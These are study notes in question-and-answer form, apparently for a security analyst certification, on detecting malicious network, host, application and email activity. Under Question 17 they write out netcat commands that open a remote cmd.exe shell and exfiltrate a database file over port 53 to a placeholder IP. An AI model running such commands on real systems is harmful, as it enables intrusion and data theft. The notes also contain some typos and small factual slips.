Chapter 03: Malicious Activity

Question 1

Router-Based Monitoring

Answer 1

Relies on routers or switches with routing capabilities to provide information about the flow of traffic on the network and the status of the network device itself

Also relies on capturing data about the traffic that’s passing through the device, which is referred to as network flows

Question 2

NetFlow, sFlow, J-Flow

Answer 2

Standard technologies for monitoring that capture flows and other router information

They record information about traffic at network device interfaces and then send that information to flow collectors

Flows are often sampled due to the sheer volume of data collected—usually 1 in 100 packets are sampled

Question 3

SNMP

Answer 3

Simple Network Management Protocol (Port 161/162)

Commonly used to collect information from routers and other network devices

Provide more information about the devices themselves vs the network traffic flow info provided by flow-capture protocols

Question 4

Flow Information Structure

Answer 4

You can see:
* Source IP
* Destination IP
* How many packets were sent
* How much data was sent
* Port and protocol used

You can feed flow information through a SIEM that uses beahvior-based detection capabilities to find issues like unexpected comms to C2 systems

Page 81 diagram

Question 5

Active Monitoring

Answer 5

Techniques that reach out to remote systems and devices to gather data

Unlike flows and SNMP monitoring, where data is gathered by sending information to collectors, active monitors are typically the data gathering location

Sometimes they might forward the information to a collector though

Active monitoring gathers data about:
* Availability
* Routes
* Packet delay
* Packet loss
* Bandwidth

EX: ping and iPerf

Question 6

iPerf

Answer 6

A tool that measures the maximum bandwidth that an IP network can handle

Public iPerf servers allow remote testing of link bandwidth in addition to internal bandwidth testing

iPerf testing data can help establish a baseline for performance to help identify when a network will reach its useful limits

Question 7

Passive Monitoring

Answer 7

Capturing information about the network as traffic pases a location on a network link

EX: A network tap can send a copy of all traffic between endpoints to a passive monitoring capture system for review

Unlike active and router-based monitoring, passive doesn’t add additional traffic to the network

Performs after-the-fact analysis since packets must be captures and analyzed vs recorded in real time as they’re sent

Question 8

Bandwidth Consumption

Answer 8

Serious concern for analysts that can cause serivce outages and disruptions of business functions

Typically, the network will be configured to use logging and monitoring methods that fit its security, design, and monitoring requirements

All that data will be send to a central system that can provide bandwidth usage alarms

Question 9

Beaconing

Answer 9

Malicious beaconing usually takes the form of a simple ping or “heartbeat” that’s sent to a C2 system as part of a botnet or malware remote control system, typically through HTTP/S

Beaconing can request commands, provide status, download additional malware, etc

Since it’s often encrypted, it blends in with other web traffic and can be difficult to identify

NOTE:
* Beaconing is not always malicious
* NTP servers, auto update systems, cluster services, etc
* These all send out beacons to let other services know they’re there and ready to support
* Always ask: is this malicious or is this authorized?

How Attackers Hide Beaconing
* Jitter: The use of a random delay to frustrate indicators based on regular connection attempt intervals
* Sparse Delivery: Reduced packet size that allows them to hide within the noise of other traffic

How Beacons Get Sent
IRC
* Not a need for IRC in most businesses, so it’s usually just turned off

HTTP/S
* Necessary for day to day work everywhere
* Your mitigation is to use an intercepting proxy at the network’s edge
* When somebody internal to your network wants to connect to something like Gmail over a secure connection, they connect to proxy first, which then makes secure connection to Gmail
* Defenders can analyze all traffic in and out using the HTTP/S connections

DNS
* Most DNS traffic isn’t inspected or filtered
* Don’t need a direct connection to the outside network and can use a local DNS resolver
* IoC 1: Several queries being repeated when a bot is checking into a C2 for more orders
* IoC 2: Commands sent within a DNS request or response query will be longer and more complicated than normal, but attackers will sometimes break their C2 messages into several different query chunks to avoid detection

Social Media
* People use social for messaging, and these messaging functions allow attackers to live off the land
* LinkedIn: Status updates from bots on LinkedIn would trigger malware signals
* Twitter: Hashtags would be used as part of the commands sent to bots

Cloud Services
* Attackers can spin up virtual machines or use app-based engines to send C2 messages
* Google’s App Engine platform or AWS Lambda has been used in the past

Metadata
* Exists within media and other files
* A set of data that describes and gives information about other data
* Metadata embedded in files can hold attacker’s C2 message

Question 10

How to Detect Beaconing Activity

Answer 10

Capture Metadata
* About all the sessions that are being established or trying to make connections
* Correlate that with analysis

IDS / IPS
* Use detection rules that identify known botnet controllers or botnet-specific behaviors

Flow Analysis
* Or other traffic-monitoring tools to ensure that systems aren’t sending unexpected traffic

Inspecting Outbound Traffic
* To ensure that infected systems aren’t resident in your network is just as important as the controls handling inbound traffic

Page 84 + 85 diagram

Question 11

Unexpected Traffic Spikes

Answer 11

Unexpected traffic on a network can take many forms:
* Scans
* Sweeps
* Probes
* Irregular P2P traffic between systems that aren’t expected to communicate directly
* Spikes in network traffic
* Activity on unexpected ports
* Direct attack traffic

Question 12

How to Detect Unexpected Traffic

Answer 12

Behavior-based detection capabilities with IDS / IPS

Traffic-monitoring systems

Manually observing traffic between systems

Question 13

Anomaly-Based Detection

Answer 13

AKA Baselines

Requires knowledge of what normal traffic is and looks like

Baselines are typically gathered during normal network operations

Once baseline data is gathered, monitoring systems can be set to alarm when the baselines are exceeded by a given threshold or when network behavior deviates from the baseline behaviors that were documented

Question 14

Behavior-Based Detection

Answer 14

AKA Heuristics

Uses network security devices and defined rules for scans, sweeps, attack traffic, and other network issues

Question 15

Protocol Analysis

Answer 15

Using a protocol analyzer to capture packets and check for problems

Protocol analyzers can help find unexpected traffic, like VPN traffic in a network where no VPN traffic should exist, or IPv6 tunnels running from an IPv4 production network

They can also identify when common protocols are being sent over an uncommon port, possibly indicating an attacker setting up an alternate service port

Question 16

How to Detect Scans, Sweeps, and Probes

Answer 16

These aren’t always significant threats to infrastructure by themselves, but they’re often precursors to more focused attacks

Detecting scans and probes is relatively simple, because of the behaviors they include like:
* Sequential testing of service ports
* Connecting to many IPs in a network
* Repeated requests to services that might not be active

Detecting stealth scans can be more challenging, but most IDS/IPS and other network security devices have built in scan detection capabilities

Enabling these features can create a lot of noise though, and sometimes you simply can’t do anything about a scan

Many orgs will feed their scan-related data into their SIEM to combine it with data from attacks and other events vs responding to scans and probes directly

Question 17

Activity on Unexpected Ports

Answer 17

This is due to one of two things:

1. Scans and sweeps attempting to connect to ports and services
2. Traffic to and from unexpected or new services set up by attackers

Always keep in mind that activity on unexpected ports could be either scenario, so look for additional context that can narrow it down

Malware and Ports
* There’s no comprehensive list of ports used by malware
* Every malware writer can decide what ports they want to use
* If an unknown open dynamic port (49152-65535) appears to be constantly open on a host, it may indicate a malicious traffic channel
* Nonstandard port usage, like HTTP, FTP, or DNS over a port that’s not the well-known port established for that protocol, it’s suspicious and worth investigating
* Mismatched port/application traffic where non-standard traffic is communicated over well-known or registered port

Mitigations
* Configure firewalls to allow only whitelisted ports to communicate on ingress and egress interfaces
* Configuration documentation should also show which server ports are allowed on any given host type
* Configure detection rules to detect mismatched protocol usage over a standard port

Netcat
* Normal Shell: Listener being set up inside the network on the victim
* Reverse Shell: Listener set up on the attacker’s machine making victim connect to them
* nc -lp 443 -e cmd.exe / nc IP 443
* This gives you a command prompt on the remote machine
* nc -lp 53 > database.sql
* Anything nc receives while listening over port 53 is put into the .sql file
* type database.sql | nc IP 53
* Pipe the type command to nc, which puts it on the listening IP at the port

Question 18

DoS Attack Patterns

Answer 18

DoS attacks follow one or more of the following patterns:

• Attempts to overwhelm a network or service through the sheer volume of requests or traffic
• Attacks on a specific service or system vulnerability to cause the system or service to fail
• Attacks on an intermediary system or network to prevent traffic from making it between two locations

Each one of these patterns requires a slightly different method of detection

Your network, system, and service monitoring capabilities need to be set up to monitor for multiple types of attacks depending on your infrastructure

A DoS from a single system or network can typically be stopped by blocking that system or network using a firewall or other network security device

IPS can also block known attack traffic, preventing a DoS from occurring

Question 19

DDoS Attack Patterns

Answer 19

DDoS attacks come from many systems or networks at the same time

They can be harder to detect due to the traffic coming from many places, which makes it look more legitimate and makes it much harder to stop

Many DDoS attacks are made up of compromised systems in botnets, allowing attackers to send traffic from hundreds or thousands of systems

Question 20

Detecting DoS and DDoS

Answer 20

You have to use multiple types of tools and monitoring systems like:
* Performance monitoring using service preformance monitoring tools
* Connection monitoring using local system or application logs
* Network bandwidth or system bandwidth monitoring (MB, GB, or TB per second)
* Dedicated tools like IDS or IPS with DoS and DDoS detection rules enabled

During response, the CLI tools can be used to analyze network traffic—like netstat—can help with troubleshooting on local servers

A view from the network or service perspective will typically provide a broader view of the issue

An unexpected surge in traffic from internet hosts could be an indication of an ongoing DDoS, but this must be backed up with other factors to verify:
* Excessive number of TIME_WAIT connections in a load balancer or web server’s state table
* High number of HTTP 503 Service Unavailable log events
* Large amounts of outbound traffic from the network can indicate that you have zombies in a botnet that are being used in a DDoS against others

Mitigating DDoS
* The Goal: Survive the DDoS attack
1. Conduct real-time log analysis to identify patterns of suspicious traffic and redirect it to a black hole or sinkhole
2. Use geolocation and IP reputation data to redirect or ignore suspicious traffic
3. Aggressively close slower connections by reducing the timeouts on affected servers
4. Use caching and backend infrastructure to offload processing to other servers
5. Utilize enterprise DDoS protection services like Cloudflare or Akamai

Question 21

Detecting and Finding Rogue Devices

Answer 21

These are devices that are connected to your network, but shouldn’t be, either by policy or because they’ve been added by an attacker

Finding rogue devices can be challenging, since many networks have hundreds or thousands of devices and device management might not be consistent across the network

Still, you can use the following to help:
* Valid MAC Address Checking: Uses MAC address information provided to network devices to validate the hardware to a list of known devices
* MAC Address Vendor Information Checking: Identify devices based on the vendor prefix for their devices
* Network Scanning: Uses tools like nmap to identify new devices with banner grabbing or fingerprinting
* Site Surveys: Physically reviewing the devices at a site either by manual verification or checing wireless networks on-site
* Traffic Analysis: Identify irregular or unexpected behavior with packet sniffers
* Digital Certificates: On endpoints and servers to authenticate and encrypt traffic using IPSec or HTTPS
* NAC and IDS

Types of Rogue Devices
* Network taps
* WAPs
* Servers
* Wired or wireless clients
* Software
* VMs
* Smart appliances

Question 22

Wired Rogues

Answer 22

Most wired rogues rely on open or unauthenticated networks to connect

Open networks without access controls like port security or NAC technology are easy targets for wired rogue devices

If you have one, it means one of two things has happened:
1. An employee or other trusted member of the org has connected a device, either without permission or without following the process required to do so
2. An attacker has connected a device to the network

In either case, respond to a wired rogue ASAP to remove it or handle is accordingly

To prevent them, you can restrict which devices can connect with port security or MAC address limiting tech, or NAC with required authentication to the network

NOTE: MAC addresses can be spoofed, so there’s no magic bullet here

Question 23

Wireless Rogues

Answer 23

Wireless rogue devices can’t always be tracked easily to a specific physical location

You might have to use signal strength measures and mapping of an area to determein wher the rogue is

If the wireless rogue is on your network though, a port scan with OS identitication turned on can often help locate the device

Wireless rogues can also spoof legit networks in attempts to persuade users that they’re part of the network, often by overpowering legit APs

You can invest in enterprise wireless controllers that will detect interference, report it, and in some cases automatically overpower it

Question 24

Processor Consumption and Monitoring

Answer 24

Understand what kind of processes consume CPU time, how much CPU utilization is occurring, and when the processes are running

Sudden spikes or increases in processor consumption can indicate new software or a process that was not previously active

Consistently high levels of CPU usage can also indicate DoS

This is a crucial part of montoring, incident detection, and response

Question 25

Memory Consumption and Monitoring

Answer 25

Most OS level memory monitoring focuses on memory consumption rather than what’s stored in memory

Most protective measures for memory-based attacks occur as part of an OS built-in memory management or when code is compiled

Orgs will often set memory thresholds, which are alarms and notifications based on typical system memory usage during peak hours

Emergency levels and alarms will go off when a system or app is approaching an out-of-memory condition

Question 26

Drive Capacity and Consumption Monitoring

Answer 26

This focuses on specific capacity levels and is intended to prevent the drive volume from filling up and causing an outage

Tools to monitor drive capacity consumption are available on all major OS

Question 27

Filesystem Changes and Anomalies

Answer 27

Monitoring for filesystem changes in real time can catch attacks as they occur

You can use tools like:
* Wazuh: Open source, provides file integrity monitoring on files, permissions, ownership, and attributes—sends alerts based on its monitoring
* Tripwire: Commercial and open source
* AIDE: Advanced Intrustion Detection Environment, commercial

Manual verification of files using known good checksums is also part of many incident responders’ practices

NSRL (National Software Reference Library) collects digital signatures to allow verification against known checksums

Question 28

System Resource Monitoring Tools

Answer 28

Windows has built in resource and performance monitoring tools: resmon and perfmon

Resmon:
* Provides easy visibility into the CPU, memory, disk, and network utilization of a system
* Network monitoring capability shows processes with network activity, which TCP connections are open, and what services are associated with open ports on the system

Perfmon:
* More detailed data with counters ranging from energy usage to disk and network activity
* Supports collection from remote systems

Question 29

Linux Performance Monitoring Tools

Answer 29

To check the CPU, disk, and memory usage you can use:
* ps: Provides information about the CPU and memory utilization, the time that a process was started, how long it’s run, and the command that started the process
* top: Provides CPU utilization under CPU stats, as well as memory usage and other details about running processes
* df: Displays a report of the system’s disk usage
* w: Indicates with accounts are logged in (not direclty resource-related, but useful when determining who might be running processes)

Question 30

Detecting Malware, Malicious Processes, and Unauthorized Software

Answer 30

Most managed environments will use a combination of these major methods to manage the software and apps on workstations, servers, and mobile devices:

• Central management tools like Microsoft Endpoint Manager, which can manage software installation and report on installed software—does not monitor in real time like perfmon or resmon
• Antivirus and antimalware tools, which are designed to detect potentially harmful software and files
• EDR (Endpoint Detection and Reponse) can help detect malicious files and behavior, and allow responses that can stop attacks immediately
• Software and file block listing, wihch uses a list of disallowed software and files, and prohibits its installation—provides a broader list of prohibited files other than only malicious ones picked up by antivirus and antimalware
• Application allow listing, which allows only permitted files and apps on a system

Windows Specific Tools
* sfc: Checks files and ensures they’re all running the correct versions and haven’t been modified
* Process Monitor and Explorer: Part of the sysinternals tool suite and can be used for live analysis and logging of processes run on the system
* Tasklist: CLI version of the task manager
* PE Explorer: Ability to browse structure of exe Windows file, see what processes are calling

Linux Tools
* pstree: Shows parent-child tree of all processes on Linux
* ps: Lists the attributes of all processes started by current process
* ps -A or -e: Shows all processes running for all users
* Malware will often use injection into shared libraries (.so)

Question 31

Abnormal OS Process Behavior

Answer 31

If you observe abnormal behaviors in the OS processes, it could indicate a rootkit or other malware has exploited an OS component

For Windows, these tools are most commonly associated with these kinds of attacks:
* cmd.exe
* at.exe
* schtasks.exe
* wmic.exe
* powershell.exe
* net.exe
* reg.exe
* sc.exe

Another common technique attackers use is to name a rogue process with a name that’s similar to a legit OS component or app, or use DLL execution to run services (rundll32.exe –> svchost)

Question 32

Unauthorized Scheduled Tasks

Answer 32

Windows: Task scheduler, which can be accessed in the start menu or CLI with schtasks—schtasks | more if you don’t want to scroll

Linux: /etc/crontab or /etc/cron or crontab -l—pay close attention to jobs running as superusers

Question 33

Application and Service Monitoring

Answer 33

A few key common, monitoring areas:
* Up/down: Is the service running?
* Performance: Does it respond quickly and as expected?
* Translational logging: Information about the function of the service is captured, such as what actions users take or what actions are performed
* Application or service logging: Logs about the function or status of the service

Each area provides part of the puzzle for visibility into an app or service’s status, performance, and behavior

During an investigation, you’ll need to identify behavior that doesn’t match with what’s typically logged

Question 34

Application Logs

Answer 34

They provide tons of information, but require knowledge of what the app’s log format is, and what those logs will contain

Linux logs are usually in /var/log

Windows app logs can end up gathered by the Windows logging infrastructure or in app-specific directories or files

Analysts must ensure that appropriate logging is set up before an incident occurs so logs are available and will be protected from modification or deletion by an attacker

Always send critical app logs to a central log collection and/or analysis service

Common app logs:
* DNS Event Logs
* HTTP Access Logs
* FTP Access Logs
* SSH Access Logs
* SQL Event Logs

DNS Event Logs
* Contains a log of all the events for each time the DNS server handles a request to convert between a domain name and IP

HTTP Access Logs
* Log containing HTTP traffic that encountered an error or traffic that matches some pre-defined rule set
* Relevant information is recorded in the common log format (CLF) or W3C extended log file format
* Status codes indicate what happened with HTTP traffic
* Some server software logs wil lhvae HTTP header information

FTP Access Logs
* Log containing FTP traffic events in a W3C extended log format

SSH Access Logs
* Unstandardized type of log that can provide basic client-server session information

SQL Event Logs
* Event/error log that records events with fields like date, time, and the action taken (server startup, individual database startup, database cache clearing, databases not starting or shutting down unexpectedly)
* SQL servers can log individual query strings sent to the database

Question 35

Introduction of New Accounts

Answer 35

Attackers will try to create accounts in apps as part of their efforts to maintain persistence

Both cloud-hosted and on-premises apps need to be logged and monitored to ensure account creation is captured, and unexpected account creation results in alerts and reporting

Account and Session Management Tools
* Local Users and Groups: Windows tool used for the management of local accounts on a system
* Active Directory Users and Computers: Windows tool that’s used for the management of accounts on a DC
* NOTE: You can create accounts through CLI with net, WMIC, or PowerShell
* who, w, rwho: Linux tools for session management
* lastlog: Retrieves the log on history from /var/log/lastlog file and displays account name, TTY, remote host, and last time user was logged in
* failog: Linux command that displays on authentication failures
* egrep: Search for terms across all logs—egrep “Failed|Failure” /var/log/auth.log

Question 36

Application and Service Anomaly Detection

Answer 36

A variety of non-security related problems can result in anomalous activity for services and apps:
* App or service-specific errors, including authentication errors, service dependecy ssues, and permissions issues
* App or services that don’t start on boot, either because of a specific error or, in the case of services, because the service is disabled
* Service failures, which are often caused by updates, patches, or other changes

When troubleshooting, attempt to start or restart the service—if that doesn’t work, review the service’s log message or error message

Anomalies due to security issues can be detected with similar methods, but you can also deploy additional protection:
* Antimalware
* Antivirus
* EDR tools
* File integrity checking tools
* Allow list tools

Question 37

Windows Service Status

Answer 37

You can check with:
* services.msc: The Services administrative tool
* sc: CLI tool, Service Controller application
* PowerShell: Service cmdlets like Start-Service

Question 38

Linux Service Status

Answer 38

You can check with:
* service [servicename]
* service –status-all
* /etc/init.d/servicename status
* systemctl

Question 39

Application Error Monitoring

Answer 39

Windows: Logs to the Windows Application log, although some maintain their own dedicated log files, Windows Event Viewer, SCOM

Linux: /var/log, specific app log location

Question 40

Application Behavior Analysis

Answer 40

Apps that have been compromised or successfully attacked can suddenly start to behave in ways that aren’t typical

Outbound comms might occur, the app may make database or resource requests not typical to its behavior, or new files and accounts can be created

Understand typical app behavior with the following:
* Documentation of the app’s normal behavior, like what systems it should connect to and how those connections should be made
* Logging, to provide a view of normal operations
* Heuristic (behavioral) analysis using antimalware tools and other security-monitoring systems to flag when behaviors deviate from the norm

Question 41

Anomalous Activity

Answer 41

We need to look in different areas to identify something that’s unusual, aka anomalous:
* Web apps
* Databases
* DNS services
* Remote access servers

If we find anomalous activity, we have to classify it as either:
* Benign
* Malicious

Symptoms of Anomalous Activity
* Strange log entries
* Excessive per-process ports and resource consumption
* Unusual user accounts
* Unexpected outbound communication
* Unexpected output
* Service defacement
* Service interruptions

Unexpected Outbound Comms
* Unapproved outbound network connections
* If you see a lot of outbound connections in router or firewall logs, and you don’t know where they’re going and haven’t approved them, it could be an IOC of C2 or beacon

Unexpected Output
* Unusual request patterns or responses, can indicate an ongoing or past attack
* If you have a web app and when you run a query, you get an unexpected output, it could indicate the server is under attack
* Additionally, sometimes the output comes in the form of code
* Detect a code injection by monitoring the number of database reads or examining HTTP response packet sizes
* If an app deisplays unformatted error messages or strange strings, it could indicate app tampering

Services Defacement
* Occurs when an attacker gains control of a web server and alters the website’s presentation

Service Interruptions
* App services may fail to start or stop unexpectedly for any number of reason, not always an attack
* App interruption is caused by a service either failing to start or halting abruptly
* Check if security services are prevented from running
* Check if process running the service is compromised
* Check if service is disabled by D/DoS
* Check if excessive bandwidth usage is disrupting a service

Detect Anomalous Behavior
* Windows: Task manager, services.msc, net start (outputs running services to CLI), PowerShell (Get-Service to see all running)
* Linux: cron, systemctl, ps, top
* Application Logs: Critical to detect problems
* Behavioral baselines, filesystem integrity checking, log analysis

Page 103 + 104 for more

Question 42

Logs, Log Analysis, and Correlation

Answer 42

You have to know how to quickly assess the organizational impact of an event and determine if it’s localized or has broader scope

That requires the following:
* Knowing if other events are correlated with the initial event
* Understanding what systems, users, services, or other assets were involved or impacted
* Data classification for any data assets that are part of the event
* Other information that may influence organizational decisions about the event

Question 43

Event Logs

Answer 43

The Windows event log can be viewed direcrtly on workstations using the Event Viewer

By default, Windows includes Application, Security, Setup, and System logs

Windows logs are stored in %SystemRoot%\System32\Winevt\Logs

Event Viewer also works for AD logs, but domains can generate more logs than you can handle—export them to a purpose-built log aggregation and analysis system

Five types of Event Logs in Windows:
1. Application: Events generated by apps and services
2. Security: Audit event like failed log on or access being denies
3. System: Events generated by the OS and its services
4. Setup: Events generated during the installation of Windows
5. Forwarded Events: Events that are sent to the local host from other computers

Four severity categories for events:
* Information
* Warning
* Error
* Audit Success / Failure

Question 44

Syslog

Answer 44

Linux maintains information about the state of the syste, events, and many other details in the /var/log directory

Additional logs can be in app-specific directories or other locations based on specific configurations or app and service defaults

Other Syslog details:
* Follows a client-server model
* De facto standard for logging of events from distributed systems
* Port 514 (UDP) over TCP/IP
* Has a PRI (priority) code
* The header contains the timestamp of the event and hostname
* The message portion contains the source process of the event and related content

Previous Security Issues Have Brought New Syslog Features
* Called syslog-ng or rsyslog
* Can use port 1468 (TCP) for consistent delivery
* TLS to encrypt messages sent to servers
* Use MD5 and SHA1 for authentication and integrity
* Message filtering, automated log analysis, event response scripting, and alternat message formats

Question 45

Security Device Logs

Answer 45

Security devices capture information about security events, system events, and other details that are useful to analysts

Most devices are capable of sending syslog-compatible messages, what they contain and how they’re formatted can vary wildly from vendor to vendor

Regardless of what device log you’re looking at, always look for:
* The type of event you’re looking for
* What identifiers appear in it that match the event or entry you’re searching for

EX: If you’re looking for blocked traffic to a host with IP 10.1.10.4, you should look at other entries for that host

Question 46

Firewall Logs

Answer 46

Most firewall logs are similar

They identify the source and destination IP, port and protocol, and what action was taken on the traffic

They might include data like:
* The role that was matched
* If there’s a specific threat identifier associated with a block
* Which interface or port the traffic entered or exited the firewall on
* Details on how much traffic was sent

Question 47

WAF Logs

Answer 47

Web App Firewall logs

Most have default rulesets that look for attacks matching the OWASP Top 10 or other common app security risks which allow admins to quickly enable a common ruleset

Usually stored in JSON format, and the logs will contain information like:
* Time of the event
* Severity of the event
* URL parameters
* HTTP method used
* Context for the rule

Question 48

Proxy Logs

Answer 48

Similar to firewall logs, proxy logs can provide useful information about connections and traffic

Proxies are used to either centralize access traffic or to filter traffic, so they usually contain:
* Source IP
* Destination IP
* Source port
* Destination port
* Requested resource
* Date and time
* Content type
* HTTP referrer
* Details about the content, like amount of traffic sent

When analyzing proxy logs, always look for the following:
* Target host IP, hostname, and what was requested
* The amount of content requested, as it could help indicate a compromise or match a known malicious package
* The HTTP request method, which can provide details of the query string with GET requests
* Unusual user agents and protocol versions, which may be useful for identifying apps, malware, or other targets

Question 49

IDS / IPS Logs

Answer 49

When a rule is triggered in IDS and IPS, the logs will contain information about the rule that was activated, as well as information about the traffic that was captured and analyzed
* EX: If you’re tracking malware that uses an IRC-based C2 network, you can search for rule hits that included a specific channel name or nickname that was used

Types of Log Outputs
* Unified output (machine readable binary file)
* Syslog
* CSV
* tcpdump (pcap)
* Input into a SIEM (centralized repository)

Snort Rule Format (Most Common)
* Action / Protocol / SourceIP / Source Port / Direction (->, < >) / Destination IP / Destination Port / (Rule Option; Rule Option;…)

Question 50

SIEM

Answer 50

Security Information and Event Management System

These leverage centralized logging and gathering along with reporting and analysis capabilities to identify potential security issues

The information is combined with threat information, IOCs data, etc to help identify issues

SIEM allow orgs to deal with massive volumes of data and security information generated by infrastructure, systems, and apps, and a major function of the SIEM is to parse and normalize data from all those different places for analysis and processing
* Data comes from listeners / collectors (syslog), agent-based (HIDS/HIPS, etc), and sensors (SPAN / taps)

Last, they provide incident management and response capabilities, allowing tracking, management, and oversight

NOTE:
* SIEM operates in Collection, Processing and Analysis, and Dissemination on the threat intelligence cycle
* Helps you collect, process, normalize, and analyze all that information
* Easily disseminate reports and information out to others
* SIEMs can be configured to automate much of this security intelligence cycle

To effectively deploy a SIEM:
1. Log all relevant events and filter irrelevant data
2. Establish and document the scope of events
3. Develop use cases to define a threat
4. Plan IR to an event
5. Establish a ticketing process to track events
6. Schedule regular threat hunting
7. Provide auditors and analysts an evidence trail

Popular SIEM Tools:
* Splunk (my fav)
* ELK Stack
* ArcSight (HIPPA, SOX, PCI DSS)
* QRadar (IBM’s platform)
* AlienVAult and OSSIM (Open-Source Security Information Management / AT&T)
* Graylog (focused on DevOps and supporting IT)

Question 51

EDR

Answer 51

Endpoint Detection and Response

Tools deployed to endpoints, using agents to monitor for and detect potential security issues, attacks, and compromises

The endpoint agents report to a central console or system, providing visibility and management capabilities

EDRs focus on using threat patterns and IOC, as well as behavioal analysis to determine an issue is occuring or has occurred

They can automatically respond to threats and neutralize, contain, or alert

Question 52

SOAR

Answer 52

Security Orchestration, Automation, and Response

Tools used to integrate security tools and systems

They rely on APIs or other integration methods to gather data from security devices like firewalls, vulnerability scanners, antimalware tools, IDS and IPS, EDR, and SIEM

The data, alerting, and reporting centralization that SOAR platforms provide is used to drive security automation tasks like triggering responses, correlation and alerting across disparate systems, and feeding analytics capabilities

A key element of SOAR is the use of playbooks, or automated sets of actions that are used when specific sets of events or triggers occur

SOAR also focus more on response with incident management, monitoring, and reporting, using data from events to build actionable threat intel from multiple sources

Orchestration
Orchestration is the automation of the automations, and there are three kinds:
1. Resource Orchestration
2. Workload Orchestration
3. Service Orchestration

Chef
* A way to automate configuration deployments and management of apps

Puppet
* Requires the installation of a master server and the client agents in the different targeted nodes to be able to do its orchestration

Ansible
* Doesn’t use user agents since everything is done with YAML

Docker
* Open platform for developing, shipping, running, and deploying apps using containerization

Kubernetes
* Provides an abstraction layer from managing these containers

Question 53

Packet Capture

Answer 53

Seeing into the traffic sent and received can help identify what’s occuring on the network

Wireshark and Tcpdump are the big two for the exam

Page 111 detailed explanations

Question 54

AbuseIPDB

Answer 54

A public tool that allows you to search for IPs, domains, or networks to see if they’ve been reported for abusive behavior

NOTE: Not considered 100% reliable, but useful as one of many other security measures that can help improve your posture

Page 114 for image

Question 55

Pattern Recognition

Answer 55

The ability to see common attack, exploit, and compromise patterns, and identify them for what they are

This is commonly used by AI and ML systems that look for known patterns asociated with compromise or malicious activity

One of the most common focuses for pattern recognition techniques is to identify C2 traffic, or beaconing

It relies on patterns like this:
* Traffic to known malicious IPs or networks
* Traffic on unexpected ports
* Traffic via protocols that are not typically in use, or outside the scope of normal traffic via that protocol
* Large data transfers
* Traffic associated with processes that typically wouldn’t send traffic like notepad.exe on a Windows system
* Traffic sent at times of the day that aren’t associated with normal business hours
* Other unexpected behaviors that don’t match typical usage patterns

Question 56

Analyzing Email

Answer 56

Most orgs use automated email analysis as a first line of defense against malicous and spam emails

They look for known malicious or spam senders, often using block lists built using information from around the world

They also scan every email looking for malicious payloads like malware or other unwanted files

The same tools often perform header analysis and message content analysis

Attackers will exploit the fact that there are actually three sender addresses in an email:
Display From
* Support [support@diontraining . com]
* This is a name with anything we want to put in there
* Attackers can make it look like—Support@diontraining . com [theft@badguy . com]
* Mail clients will sometimes only show outside the brackets, not the actual email

Envelope From
* Various labels hidden from your mail client
* Essentially, this is your return address
* It can be anything, but you never see it because it’s hidden

Received From / By
* List of MTAs that processed the email
* Not displayed to your client

NOTE: If you think something is suspicious, open up the email header and start doing analysis on it

Question 57

Email Forwarding

Answer 57

When you forward an email, it places the content into a new mail envelope, removing the header information that you may need to investigate

SPF breaks because the forwarding sender will now be the sender, and SPF checks may fail at the new destination as a result

Automatic forwarding is a security concern that needs to be addressed, because attackers will sometimes use it to send emails once compromising a legitimate account

Question 58

DKIM

Answer 58

DomainKeys Identified Mail

Provides a cryptographic authentication mechanism for mail utilizing a public key published as a DNS record, and can either replace or be used with SPF

DKIM signs both the body of the message and elements of the header, helping to ensure the message is actually from the org it claims to be from

It adds a DKIM-Signature header, which can be checked against the public key that’s stored in public DNS entries for DKIM-enabled orgs

How It Works
* Once you’ve configured, when you send an outgoing email, your MTA calculates a hash value of the selected message headers
* Signs that hash with its private key
* When the server receives, it decrypts the hash value, and then runs your headers through the has
* If they match, nothing modified in transit
* Done by the severs, not by the individual account, so you verify the server actually sent it

Question 59

SPF

Answer 59

Sender Policy Framework

An email authentication technique that allows orgs to publish a list of their authorized email servers

It’s a DNS record that identifies hosts authorized to send mail for the domain, with only one being allowed per domain

SPF records are added to the DNS information for your domain, and they specify which systems are allowed to send email fromthat domain

EXAMPLE
TXT @ v=spf1
mx include: _ spf.google.com
include:email.freshdesk.com -all
* You can only have one SPF statement, but this is one line when written in DNS
* You can authorize multiple servers to send on your behalf, but you can only do it one line

When you receive an email, your server checks the DNS record and sees if the return path matches one of the servers in this mail record—if so, you’re likely to receive and it’s not spam

Systems not listed in SPF will be rejected

Question 60

DMARC

Answer 60

Domain-Based Message Authentication, Report, and Conformance

A protocol that ensures proper application of SPF and/or DKIM, utilizing a policy published as a DNS record, to determine whether an email message is authentic
* Like SPF and DKIM, DMARC records are published in DNS
* Unlike SPF and DKIM, DMARC can be used to determine if you should accept a message from a sender
* Using DMARC you can choose to reject or quarantine message that aren’t sent by a DMARC-supporting sender

Question 61

File Analysis

Answer 61

To help analyze files for potentially malicious content, you can:

1. Use hashing to compare potentially malicious or suspect files to original, known good files—Tripwire will monitor files based on hashes, but manual hashing with SHA256 or MD5 can be used to compare as well
2. Search files for strings, which is helpful if you want to look at a compiled program like an exe to see what it might do—use strings in Linux

Question 62

Sandboxing

Answer 62

Safe, instrumented environments where you can run potentially malicious files and apps to determine what they attempt to do and how they do it

1. Joe Sandbox: Allows analysts to analyze and understand the behavior of malware samples, test against multiple OS, and allow advanced options using a set of parameters
2. Cuckoo Sandbox: An automated malware analysis tool that you can run as a self-hosted tool—Cuckoo works on more than malware, and analyzes PDFs, MS Office and files, and malicious websites
3. Flare VM: Allows you to run a Windows binary on the system and see what the status is and all the different changes the malware is making

Things we can do in a sandbox environment, especially when analyzing malware:
* Monitor system changes
* Execute known malware
* Identify process changes
* Monitor network activity
* Monitor system calls
* Create snapshots
* Record file creation and deletion
* Dump VM memory

Question 63

DGA

Answer 63

Domain Generation Algorithm

Method used by malware to evade blocklists by dynamically generating domain names for C2 networks

Instead of a static IP or name, they can create new ones and pick from a list, and keep moving through them until we block them all—then they just create new ones after we block them all

How attackers do this:
1. Attacker sets up one or more DDNS (dynamic DNS) services—allows them to have domain names generated on the fly, and they’ll sign up with a service using fake payment or credentials, or a host that doesn’t care about illicit acvitiy
2. Malware code implements the DGA to create a list of new domain names
3. A parallel DGA is used to create name records on the DDNS service—matches to the malware based on the same seed that’s generated in the previous step
4. The malware tries a selection of the domains it’s created to connect to C2
5. C2 server communicates with a new seed for the DGA to prevent being blocked

Fast Flux Network
Method used by malware to hide the presence of C2 networks by continually changing the host IP addresses in domain records using DGA

How to Detect DGA
* If you see callouts from your systems to random IPs that look like A1ZWBR93 . com / 94ZGYJS9 . com / etc
* If you get a high rate of NXDOMAIN errors when resolving the DNS

